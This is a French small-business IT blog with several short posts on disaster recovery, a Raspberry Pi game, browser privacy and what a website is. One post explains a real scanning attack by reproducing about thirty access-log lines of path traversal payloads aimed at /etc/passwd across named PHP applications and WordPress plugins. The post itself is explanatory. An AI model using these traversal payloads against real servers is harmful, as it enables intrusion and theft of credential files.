Un PCA / PRA de compétition

Dès qu’un nombre important d’utilisateurs (70 à 80 en l’occurrence) dépendent pour leur activité professionnelle quotidienne d’un service critique (un ERP par exemple), la problématique du plan de continuité ou de reprise d’activité (PCA / PRA) devient essentielle à la qualité du sommeil de l’administrateur du système et à la sérénité du dirigeant de la société.

Bien sûr le service est hébergé sur un serveur installé dans une salle blanche suréquipée en dispositifs assurant un très haut niveau de fiabilité (SLA de 99.95% !). Et les données sont répliquées localement sur des disques doublés.

Et si malgré tout le serveur tombait en panne ? Et si l’accès réseau vers le serveur était interrompu ? Et si un accident, un incendie ou un attentat détruisait la salle blanche ?

Et si, en plus, l’administrateur était justement à ce moment là indisponible et injoignable, disons en vacances au large sur un voilier… ?

Alors, il suffirait que l’un des responsables habilités de la société clique sur un bouton, confirme et le service serait alors immédiatement à nouveau disponible sur le serveur de secours installé à 400 km du serveur principal.

Tout cela est désormais une réalité très accessible (à part les vacances au large sur un voilier pour l’administrateur).

PCA_PRA

Jeux de geek

jeux2geek

Jeu du presse-bouton

Règles du jeu

Les 4 diodes de couleur rouge ou verte s’allument au hasard. Il faut les éteindre le plus vite possible en appuyant sur les boutons rouge ou jaune correspondants, placés à droite des diodes et ordonnés à l’identique.

Eléments du jeu

  • A gauche sur la photo : un Raspberry Pi, un ordinateur complet de la taille d’une carte de crédit. En l’occurrence, il sert à piloter les diodes par l’intermédiaire de son interface GPIO.
  • A droite : une platine d’essai avec un montage électronique à base de diodes, de résistances, de boutons pressions et de mini câbles de raccordement.
  • Entre les deux : une nappe de raccordements pour connecteurs 26 broches.

Et, oui, quand on passe ses journées devant son ordinateur à taper sur son clavier, le faire devant des iodes sur quatre boutons, forcément, cela détend !

A vrai dire, le vrai geek s’amuse davantage à concevoir, réaliser et programmer ce jeu qu’à y jouer. Que voulez-vous…

Un bel exemple de cyberattaque L7

A quoi ressemble une cyberattaque dans la réalité (et pas comme au cinéma où une jolie tête de mort apparaît sur l’écran d’un ordinateur) ?

Et bien à ça :

107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /KikChat/private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 500 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 492 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 554 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 550 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /index.php?page=../../../../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /gwebmail/?module=../../../../etc/passwd%00 HTTP/1.0” 404 490 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /?module=../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /spywall/languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0” 404 505 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0” 404 497 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /spywall/releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0” 404 505 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:30 +0100] “GET /releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0” 404 497 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:30 +0100] “GET /asaancart%20v-0.9/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0” 404 523 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0” 404 502 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0” 404 494 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 496 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 487 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] “GET /sessions.php?globalIncludeFilePath=../../../../../../etc/passwd%0000 HTTP/1.0” 404 493 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] “GET /idoit/controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0” 404 501 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] “GET /controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0” 404 495 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /jcow/index.php?p=../../../../../../etc/passwd%00 HTTP/1.0” 404 495 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /index.php?p=../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /vanilla/index.php?p=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 498 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 531 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /wp-content/plugins/old-post-spinner/logview.php?ops_file=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 528 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 520 “-” “-“

Les traces réelles d’une cyberattaque…

Joli, non ?

La toute  petite taille de caractère permet d’avoir une vue d’ensemble. Les non informaticiens n’en verraient pas plus en plus gros. Les autres sauront comment accéder à une présentation plus lisible.

L’attaque (85 tentatives en 24 secondes à 23:17 hier soir) cherche à exploiter des failles de sécurité pour récupérer le fichier qui contient les mots de passe du serveur. Ils y sont sous leur forme cryptée mais ce fichier récupéré pourrait être confortablement soumis à un traitement de décodage intensif et donner ainsi un accès pratique au serveur visé par l’attaque.

L’attaquant est identifié par 107.23.240.63, son adresse IP.  On obtient facilement une description plus complète à son sujet :

NetRange:       107.20.0.0 – 107.23.255.255
CIDR:           107.20.0.0/14
OriginAS:
NetName:        AMAZON-EC2-8
NetHandle:      NET-107-20-0-0-1
Parent:         NET-107-0-0-0-0
NetType:        Direct Assignment
Comment:        The activity you have detected originates from a dynamic hosting environment.
Comment:        For fastest response, please submit abuse reports at http://aws-portal.amazon.com/gp/aws/html-forms-controller/contactus/AWSAbuse
Comment:        For more information regarding EC2 see:
Comment:        http://ec2.amazonaws.com/
Comment:        All reports MUST include:
Comment:        * src IP
Comment:        * dest IP (your IP)
Comment:        * dest port
Comment:        * Accurate date/timestamp and timezone of activity
Comment:        * Intensity/frequency (short log extracts)
Comment:        * Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.
RegDate:        2011-05-03
Updated:        2012-03-02
Ref:            http://whois.arin.net/rest/net/NET-107-20-0-0-1OrgName:        Amazon.com, Inc.
OrgId:          AMAZO-4
Address:        Amazon Web Services, Elastic Compute Cloud, EC2
Address:        1200 12th Avenue South
City:           Seattle
StateProv:      WA
PostalCode:     98144
Country:        US
RegDate:        2005-09-29
Updated:        2009-06-02
Comment:        For details of this service please see
Comment:        http://ec2.amazonaws.com/
Ref:            http://whois.arin.net/rest/org/AMAZO-4

L’attaque est donc menée depuis un serveur virtuel proposé à  location à n’importe qui sur le “Cloud” par une compagnie américaine installée à Seattle. La description fournit même des indications sur la procédure à utiliser pour dénoncer les abus, à condition de révéler les détails de son identité, évidemment !

L’attaque, sans doute menée en parallèle sur des milliers d’autres ordinateurs, a certainement abouti quelque part et fourni par exemple aux cyber-pirates un nouveaux serveur pour lancer d’autres attaques. C’est une activité très répandue de nos jours et facilement praticable en toute impunité.

Et le “L7” ?

“L7” signifie ici “level 7” (niveau 7) et fait référence à la plus haute  couche du modèle ISO 7498. Ce modèle abstrait désigne une classifications par ailleurs complètement inutile mais en l’occurrence, une “cyberattaque de niveau 7” fait tout de suite beaucoup plus sérieux.

Préferez la “barre d’adresse” !

Non seulement c’est plus efficace mais en plus cela protège votre vie privée : il vaut mieux utiliser la barre d’adresse plutôt que les zones de recherche de votre navigateur.

navigation_directe

Exemple de zones de recherche sur Firefox

La barre d’adresse donne un accès direct au site Internet recherché. C’est plus rapide et, dans ce cas, seul le serveur du site visité enregistre votre passage. A savoir : il est inutile d’y mettre http:// et les www sont le plus souvent facultatif.

Lez zones de recherche soumettent d’abord tout ce qu’on y met à un moteur de recherche. Celui-ci :

  • enregistre l’intérêt porté sur le sujet donné,
  • affiche une liste de liens dont l’ordre dépend notamment des investissements publicitaires associés,
  • mémorise ensuite le lien choisi vers le site associé à cette recherche.

Autant d’informations précieusement recueillies, en plus de celles stockées dans les cookies, que la société qui vous fournit “gratuitement” le moteur de recherche enregistre pour les commercialiser… Par ailleurs, le site demandé peut être ignoré (ou censuré) par le moteur de recherche.

A ce propos, tout est fait pour inciter les utilisateurs à avoir le site d’un moteur de recherche comme page d’accueil ou, pire, à installer une pseudo barre d’adresse, les fameuses “tool bars” offertes. Du coup, toute ouverture du navigateur est soigneusement enregistrée !

Pourtant, ouvrir son navigateur sur une page vierge est possible et même recommandé. C’est tellement plus rapide, discret et efficace !

Ceux qui sont très observateurs, remarqueront que dans l’exemple du moteur de recherche utilisé pour illustrer cet article, il y a désormais un https://. Le s implique entre autres un cryptage des informations échangées avec le moteur de recherche. Seraient-elle si précieuses ?

Un “site” Internet, c’est quoi ?

siteUn exemple de site internet parmi d’autres…

Un “site”, c’est :

  1. un nom de domaine,
  2. un hébergement,
  3. un contenu,
  4. des mises à jour…

Le plus important, c’est le nom de domaine (barme.fr par exemple).  C’est ça qui donne l’accès à votre site Internet. Il faut impérativement en être le “propriétaire” pour avoir le contrôle de son site. Un nom de domaine est attribué à la première personne qui le demande et cette personne en conserve l’usage exclusif tant qu’il paye les droits d’enregistrement (modiques et annuels).

L’hébergement, c’est l’ordinateur (on parle d’un serveur) qui sera sollicité à partir du nom de domaine. Il y a une multitude de solutions d’hébergement et il est très facile d’en changer. Il faut juste s’assurer que l’hébergement choisi offre toutes les facilités que l’on souhaite utiliser. Un hébergement se loue habituellement au mois.

Le contenu est tout l’intérêt d’un site Internet. Il faut bien évidemment qu’il soit bien présenté pour les “visiteurs” mais auparavant, il faut déjà qu’il soit facile à “mettre en ligne” et à faire évoluer. Là aussi, il y a de multiples solutions dont les plus accessibles sont apportées par des CMS (Content Management System) tel que celui utilisé pour ce blog.

Dès lors que l’on peut accéder, grâce à un nom de domaine, au contenu d’un site Internet placé sur un hébergement, il ne reste plus qu’à le faire vivre par des mises à jour régulières ; une activité qui demande toujours plus de temps qu’on l’imagine.

Pourquoi un blog pour l’EURL Barme ?

Pour mettre des informations à la disposition des clients (ou futurs clients) de l’EURL Barme !

  • des informations simples et utiles, évidemment,
  • des nouvelles,
  • des explications générales qui intéressent tout le monde,
  • des documents qui pourront servir de support à des explications plus détaillées.

Bref, toutes sortes d’informations qui sont bien mieux ici que sur le site Internet principal de l’EURL Barme.